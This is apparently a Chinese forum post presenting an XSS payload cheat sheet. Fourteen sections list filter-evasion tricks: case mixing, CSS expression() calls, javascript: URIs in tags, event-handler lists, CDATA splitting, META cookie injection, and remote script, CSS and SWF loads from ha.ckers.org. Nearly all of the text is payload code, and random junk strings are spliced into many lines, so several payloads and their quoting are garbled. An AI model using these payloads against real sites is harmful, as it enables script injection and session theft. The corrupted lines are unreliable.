Cross Site Scripting(XSS)攻击手法介绍

admin

1. 改变字符大小写
0 _* Q( h- S2 S5 G& l0 Q


    <sCript>alert(‘d’)</scRipT>

2. 利用多加一些其它字符来规避Regular Expression的检查

    <<script>alert(‘c’)//<</script>

: v; `8 L" l6 f' H    <SCRIPT a=">" SRC="t.js"></SCRIPT>

- }* ]' t( {$ s9 L; z, |9 X    <SCRIPT =">" SRC="t.js"></SCRIPT>

' J. h7 Q# a1 ^3 N# s; o    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
' q$ g5 `4 x5 _" a' H% o0 Y
    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
) ]) O) }- t7 `% O" l6 E( o  y- n
2 D; U  X# M7 l. w7 _9 g. q    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
9 X- ~: U; j$ q. g# E+ t+ s, r
  [. d  l/ I" Y3. 以其它扩展名取代.js

' V3 f: S; L' a- e4 l- v    <script src="bad.jpg"></script>

& j3 e! W) y9 U7 a6 `4. 将Javascript写在CSS档里
) ]! _1 ]5 z6 E1 q
& R6 I4 q! k& G/ C6 F( Z9 y    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

# r( J! {# k' d2 u$ Y3 y       example:

          body {

4 x& Y- f. O* J  w" E9 k% ^- y               background-image: url(‘javascript:alert("XSS");’)

' x2 v$ X, a+ |& z2 g          }
( ?" X/ K4 J, y* {
) k! j3 L: [- y) P$ }& c" F) |3 Y$ ^" t5. 在script的tag里加入一些其它字符
! b& U& T- J0 C+ \' U
    <SCRIPT/SRC="t.js"></SCRIPT>
" y  x9 J- M) S
* H, t6 v3 ~+ H3 ~1 D    <SCRIPT/anyword SRC="t.js"></SCRIPT>
9 y" {  Y" X3 c
6. 使用tab或是new line来规避

    <img src="jav ascr ipt:alert(‘XSS3′)">

    <img src="jav ascr ipt:alert(‘XSS3′)">
( A) n) s! H9 g. l% o% h9 X, D. Z: a
( U& I6 U& R' f$ N    <IMG SRC="jav ascript:alert(‘XSS’);">

: t9 I$ V0 {8 q$ x+ @1 X+ a7 n5 t$ K         -> tag
) _9 e4 c8 Q. G2 B2 U  ], L
         -> new line

7. 使用"\"来规避
0 x# u0 o# D: n4 J7 i
    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>

    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
8 s. g7 ^) d- \+ T; M: a
% ^3 {* n, a" o/ q4 U1 L, X    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">

- g' f  r' X( {# h; J  l% }    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">

    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
" N2 T6 b0 v  x  _: C+ D
8. 使用Hex encode来规避(也可能会把";"拿掉)

: m2 {. b( i: h- u2 ~3 Z    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">

        原始码：<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
& |4 k& X# Y/ v  t* \4 u
        原始码：<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">

9. script in HTML tag

% x1 W" U, G/ q$ E    <body onload=」alert(‘onload’)」>

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. 在swf里含有xss的code

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
. V3 ]2 B3 w3 o1 u& ^# u/ U7 {( H
# h' S. X( \' I# c% _# a- l11. 利用CDATA将xss的code拆开，再组合起来。
; {/ e; ^+ E7 b
    <XML ID=I><X><C>

6 w, }4 X5 [' y# Z: Y0 y    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

9 L: K2 Z0 M- L% \& ~+ S    </C></X>

    </xml>

% L" Z: K0 B$ y' @) K2 [    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
$ `& A+ l) u  H  }
    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
6 r% R* q# u& q! E
12. 利用HTML+TIME。

! F6 C' _8 m* |, K+ Q$ Y/ l! V' v0 C    <HTML><BODY>
- d* e9 h3 G) z5 o
9 L+ S/ e% m. ?. w    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
# @7 G% H; m3 ?/ F
+ v7 {: y8 M4 U- E9 T    <?import namespace="t" implementation="#default#time2">
9 y' Y* B7 w0 M2 B8 U1 X; z3 X! o
" z% X. S" u6 l2 [    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
/ W7 f$ u3 B- R
; ~9 w& ^) T9 `    </BODY></HTML>
5 v: }5 C1 \# B  O) T0 ^! N
- N$ t1 A" B* F9 _% {13. 透过META写入Cookie。

) p  `  d4 u0 |0 P' }    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">

/ W/ k' Z+ k- s4 y& g3 l14. javascript in src , href , url

, j# k( N+ Z8 d1 A: u: r( h" L  L    <IFRAME SRC=javascript:alert(’13′)></IFRAME>
# x! D  ?6 L& z* x* D) L) F% |3 s
1 S2 _5 B/ q/ ^2 ~, S    <img src="javascript:alert(‘XSS3′)">
  D2 C( R0 R/ m4 v3 G4 h& T
<IMG DYNSRC="javascript:alert(‘XSS20′)">

    <IMG LOWSRC="javascript:alert(‘XSS21′)">

: T  p* L" Z  v" W    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">

0 N/ p: o7 ], D3 `* T8 E2 }# w    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
' H& S) d" w) X! w/ q; U  J3 z
" p4 U; M6 a/ |6 v8 x    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">

    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">

    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
% E* B/ ~4 ~( `( g" S1 E+ O
    </STYLE><A CLASS=XSS></A>
, G" p; U% Y" q% U, u1 \
    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
7 _9 l5 @, \( z  R
  q( n' a& ~% n